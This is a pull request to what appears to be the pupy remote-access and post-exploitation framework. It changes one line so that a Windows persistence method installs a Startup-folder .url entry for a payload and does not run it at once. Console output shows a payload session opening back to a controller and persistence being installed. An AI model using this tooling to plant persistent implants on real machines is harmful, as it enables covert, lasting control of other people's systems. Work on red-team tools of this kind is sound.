### PR TITLE
Update persistence.py

### DIFF
--- a/pupy/modules/persistence.py
+++ b/pupy/modules/persistence.py
@@ -138,7 +138,7 @@ class Persistence(PupyModule):
                 return
 
         persist = self.client.remote('winpwnage.core.scanner', 'function', False)
-        result = persist(uac=False, persist=True).run(
+        result = persist(uac=False, persist=True, execute=False).run(
             id=method, payload=args.payload, name=name, add=not args.remove
         )
         if not result:


### PR DESCRIPTION
Fix the bug that execute module is preferred for persistent command.

Error:
```
>> persistence -n test -m 9 -p C:\\Users\\xxx\\Desktop\\pupyx64.Obpqhr.exe
[%] Attempting to run id (9) configured with payload (C:\Users\dark\Desktop\pupyx64.Obpqhr.exe)
[%] Searching for (ieframe.dll) in system32 and syswow64
[%] Attempting to launch C:\Users\xxx\Desktop\pupyx64.Obpqhr.exe using (rundll32.exe) binary
[+] Successfully created process (C:\Users\xxx\Desktop\pupyx64.Obpqhr.exe) exit code (0)
[*] Session 2 opened (dark@win-xxx) (192.168.126.132:49755)
```

Proper:
```
>> persistence -n test -m 9 -p C:\\Users\\xxx\\Desktop\\pupyx64.Obpqhr.exe
[%] Attempting to run id (9) configured with payload (C:\Users\dark\Desktop\pupyx64.Obpqhr.exe)
[+] Startup file created: C:\Users\xxx\AppData\Roaming\Microsoft\\Windows\\Start Menu\\Programs\\Startup\test.eu.url
[+] Successfully installed persistence, payload will run at login
```